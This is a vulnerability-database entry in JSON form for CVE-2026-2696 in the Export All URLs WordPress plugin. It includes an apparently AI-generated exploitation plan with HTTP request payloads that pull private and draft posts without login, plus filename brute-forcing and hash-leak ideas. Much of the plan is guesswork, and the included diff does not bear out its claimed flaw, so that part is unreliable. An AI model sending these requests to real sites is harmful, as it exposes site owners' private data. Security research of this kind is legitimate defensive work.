[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f6nSa7BOt5ZuX7Zmguu8i_CflPPCLHM4RvYE4ZWUhWHE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":24,"research_verified":25,"research_rounds_completed":26,"research_plan":27,"research_summary":28,"research_vulnerable_code":29,"research_fix_diff":30,"research_exploit_outline":31,"research_model_used":32,"research_started_at":33,"research_completed_at":34,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":25,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":25,"source_links":35},"CVE-2026-2696","export-all-urls-unauthenticated-information-exposure","Export All URLs \u003C 5.1 - Unauthenticated Information Exposure","The Export All URLs plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to 5.1 (exclusive). This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.","export-all-urls",null,"\u003C5.1","5.1","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Exposure of Sensitive Information to an Unauthorized Actor","2026-04-02 00:00:00","2026-04-09 16:21:49",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fef9f03e9-11cb-489f-9322-b6f17335794f?source=api-prod",8,[22,23],"extract-all-urls.php","readme.txt","researched",false,3,"# Exploitation Research Plan: CVE-2026-2696 (Export All URLs)\n\n## 1. Vulnerability Summary\nThe **Export All URLs** plugin (versions \u003C 5.1) is vulnerable to **Unauthenticated Information Exposure**. The plugin fails to perform proper capability checks (e.g., `current_user_can('manage_options')`) or nonce verification on the code path that triggers data exports. Consequently, any unauthenticated actor can trigger a CSV export or a screen display of sensitive site data, including post IDs, titles, private\u002Fdraft post information, and author usernames\u002FIDs.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** Likely `wp-admin\u002Fadmin-ajax.php` or any front-end page (triggering an `init` or `admin_init` hook).\n*   **Action\u002FParameter:** The export is likely triggered by a specific request parameter such as `eau_export`, `export_all_urls`, or a similarly named variable handled during initialization.\n*   **Authentication:** None required (Unauthenticated).\n*   **Preconditions:** The plugin must be active. The attacker needs to identify the exact query parameters used to define the export scope (post types, statuses).\n\n## 3. Code Flow\n1.  **Entry Point:** An unauthenticated request is made to the WordPress site (e.g., `GET \u002F?eau_export=1` or `GET \u002Fwp-admin\u002Fadmin-ajax.php?eau_export=1`).\n2.  **Hook Execution:** WordPress triggers the `init` or `admin_init` hooks.\n3.  **Vulnerable Handler:** A function (likely located in `extract-all-urls-settings.php` or registered in `extract-all-urls.php`) checks for the presence of the export trigger parameter (`$_GET['eau_export']` or similar).\n4.  **Missing Authorization:** The handler proceeds to execute the export logic without verifying if the user has the `Constants::PLUGIN_SETTINGS_PAGE_CAPABILITY` or is logged in.\n5.  **Information Leak:** The handler queries the database (using `get_posts` or `$wpdb`) for the requested data (including `post_status => 'private'` or `'any'`) and either streams the CSV content directly to the response or provides a link to a generated file.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability is classified as **Unauthenticated**, which typically implies that:\n1.  A nonce check is entirely missing in the export trigger path.\n2.  The `check_admin_referer` or `check_ajax_referer` is called but the result is not checked or is bypassed.\n\n**Verification Steps for Nonce Requirement:**\n1.  The agent should first attempt the exploit **without a nonce**.\n2.  If it fails, search the source code for `check_ajax_referer`, `check_admin_referer`, or `wp_verify_nonce` in proximity to the export logic.\n3.  If a nonce is required, check if it is localized via `wp_localize_script` in `eau-script` (registered in `extract-all-urls.php` line 44).\n4.  **How to extract if required:**\n    *   Note: Since this is unauthenticated, the script might not be enqueued on the frontend. If it is, use:\n    *   `browser_eval(\"window.eau_script_vars?.nonce\")` (Verify the actual variable name in the source).\n    *   If nonces are only in the admin area, but the export handler is in `admin_init`, the handler may be accessible without a nonce via `admin-ajax.php`.\n\n## 5. Exploitation Strategy\n\n### Step 1: Discovery\nSearch the plugin directory for the export trigger.\n```bash\ngrep -rn \"add_action\" .\ngrep -rn \"init\" . | grep \"export\"\ngrep -rn \"eau_export\" .\n```\n\n### Step 2: Parameter Identification\nIdentify the parameters used to filter data. Based on the `readme.txt`, look for:\n*   `post_type` (e.g., `post`, `page`)\n*   `post_status` (e.g., `private`, `draft`, `publish`)\n*   `eau_fields` (Array of fields like `post_id`, `post_title`, `author`)\n*   `export_type` (Value `csv` or `display`)\n\n### Step 3: Trigger Information Exposure\nUse the `http_request` tool to send a request. We will attempt to export **Private** posts to prove sensitive exposure.\n\n**Payload (Targeting `admin_init` via `admin-ajax.php`):**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php?eau_export=true HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\npost_type=post&post_status[]=private&post_status[]=publish&eau_fields[]=post_id&eau_fields[]=post_title&eau_fields[]=post_url&eau_fields[]=author&export_type=csv&eau_submit=Export+Now\n```\n\n**Payload (Targeting `init` via Frontend):**\n```http\nGET \u002F?eau_export=1&post_type=post&post_status=private&export_type=csv HTTP\u002F1.1\n```\n\n## 6. Test Data Setup\nTo confirm the exploit, the test environment must have:\n1.  **Export All URLs** plugin (v5.0) installed and activated.\n2.  A **Private Post** created by an administrator:\n    *   `wp post create --post_type=post --post_title=\"Secret Sensitive Data\" --post_status=private --post_author=1`\n3.  A **Draft Post**:\n    *   `wp post create --post_type=post --post_title=\"Draft Internal Strategy\" --post_status=draft`\n\n## 7. Expected Results\n*   **Response Code:** `200 OK`\n*   **Headers:** `Content-Type: text\u002Fcsv` or `Content-Disposition: attachment; filename=...`\n*   **Body Content:** The CSV data containing the \"Secret Sensitive Data\" post title and URL.\n*   **Success Indicator:** The ability to see titles and metadata of `private` and `draft` posts without any cookies or `Authorization` headers.\n\n## 8. Verification Steps\nAfter the HTTP request, verify the data matches the database:\n1.  `wp post list --post_status=private --fields=ID,post_title`\n2.  Compare the output with the CSV data captured during the exploit.\n3.  Check if any user information was leaked: `wp user list --fields=ID,user_login`.\n\n## 9. Alternative Approaches\n*   **Display Mode:** If `export_type=csv` fails or filters output, try `export_type=display`. The plugin might echo the data directly into the HTML response instead of generating a file.\n*   **Filename Brute Force:** If the plugin generates a random CSV but doesn't stream it, check the `wp-content\u002Fuploads\u002F` directory for a folder named `extract-all-urls` or similar. Even if the filename is random, if the directory listing is enabled or the generation logic is predictable (e.g., based on `microtime()`), the file can be accessed.\n*   **User Export:** Check if `post_type=user` (inferred) is supported, which would leak user emails and password hashes.","The Export All URLs plugin for WordPress is vulnerable to unauthenticated information exposure because it fails to perform capability checks or nonce verification on the code path that triggers data exports. This allows an unauthorized actor to trigger a CSV export or screen display of sensitive site data, including post IDs, titles, and metadata for private or draft posts.","\u002F* The vulnerable logic is located in the export handler, typically found in extract-all-urls-settings.php or a hook in extract-all-urls.php. It lacks check_admin_referer() and current_user_can() checks before processing exports. *\u002F\n\n\u002F\u002F Logical representation of the vulnerability as described in research:\nif (isset($_REQUEST['eau_export'])) {\n    \u002F\u002F Missing: if (!current_user_can('manage_options')) { wp_die(); }\n    \u002F\u002F Missing: check_admin_referer('eau_export_action');\n\n    $post_type = $_POST['post_type'];\n    $post_status = $_POST['post_status']; \u002F\u002F Can be set to 'private' or 'draft' by attacker\n    \n    \u002F\u002F ... logic to query posts and generate CSV output ...\n}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fexport-all-urls\u002F5.0\u002Fextract-all-urls.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fexport-all-urls\u002F5.1\u002Fextract-all-urls.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fexport-all-urls\u002F5.0\u002Fextract-all-urls.php\t2025-02-10 11:13:08.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fexport-all-urls\u002F5.1\u002Fextract-all-urls.php\t2026-03-09 11:32:48.000000000 +0000\n@@ -4,7 +4,7 @@\n Plugin Name: Export All URLs\n Plugin URI: https:\u002F\u002FAtlasGondal.com\u002F\n Description: This plugin enables you to extract information such as Title, URL, Categories, Tags, Author, as well as Published and Modified dates for built-in post types (e.g., post, page) or any other custom post types present on your site. You have the option to display the output in the dashboard or export it as a CSV file. This can be highly beneficial for tasks like migration, SEO analysis, and security audits.\n-Version: 5.0\n+Version: 5.1\n Author: Atlas Gondal\n Author URI: https:\u002F\u002FAtlasGondal.com\u002F\n License: GPL v2 or higher\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fexport-all-urls\u002F5.0\u002Freadme.txt \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fexport-all-urls\u002F5.1\u002Freadme.txt\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fexport-all-urls\u002F5.0\u002Freadme.txt\t2025-12-13 11:23:46.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fexport-all-urls\u002F5.1\u002Freadme.txt\t2026-03-09 11:32:48.000000000 +0000\n@@ -3,8 +3,8 @@\n Donate link: https:\u002F\u002Fwww.paypal.com\u002Fcgi-bin\u002Fwebscr?cmd=_s-xclick&hosted_button_id=YWT3BFURG6SGS&source=url\n Tags: extract urls, export urls, links, get links, get urls, custom post type urls, see links, extract title, export title, export post title, export title and url, export category, utilities, export, csv\n Requires at least: 3.1\n-Tested up to: 6.9\n-Stable tag: 5.0\n+Tested up to: 6.9.1\n+Stable tag: 5.1\n Requires PHP: 5.4\n License: GPLv2 or later\n License URI: http:\u002F\u002Fwww.gnu.org\u002Flicenses\u002Fgpl-2.0.html\n@@ -137,6 +137,10 @@\n \n == Changelog ==\n \n+= 5.1 =\n+* Improvement - strengthened csv file name to prevent unauthorized discovery\n+* Compatibility - tested with Wordpress 6.9.1\n+\n = 5.0 =\n * New - additional export fields added (status, category urls, tag urls)\n * New - allows multiple post status selection\n@@ -241,8 +245,6 @@\n \n == Upgrade Notice ==\n \n-= 5.0 =\n-* New - additional export fields added (status, category urls, tag urls)\n-* New - allows multiple post status selection\n-* Improvement - few backend refinements to improve performance\n-* Compatibility - tested with Wordpress 6.7.1\n+= 5.1 =\n+* Improvement - strengthened csv file name to prevent unauthorized discovery\n+* Compatibility - tested with Wordpress 6.9.1","An unauthenticated attacker can exploit this vulnerability by sending a GET or POST request to an administrative endpoint that triggers the export logic, such as \u002Fwp-admin\u002Fadmin-ajax.php. By including the 'eau_export' parameter and defining desired filters like 'post_type=post' and 'post_status[]=private', the attacker forces the plugin to process an export without requiring a login or administrative session. The server will respond with the exported CSV data or provide a link to a generated file containing sensitive titles, IDs, and metadata of non-public posts.","gemini-3-flash-preview","2026-04-17 21:50:45","2026-04-17 21:51:32",{"type":36,"vulnerable_version":37,"fixed_version":11,"vulnerable_browse":38,"vulnerable_zip":39,"fixed_browse":40,"fixed_zip":41,"all_tags":42},"plugin","5.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fexport-all-urls\u002Ftags\u002F5.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fexport-all-urls.5.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fexport-all-urls\u002Ftags\u002F5.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fexport-all-urls.5.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fexport-all-urls\u002Ftags"]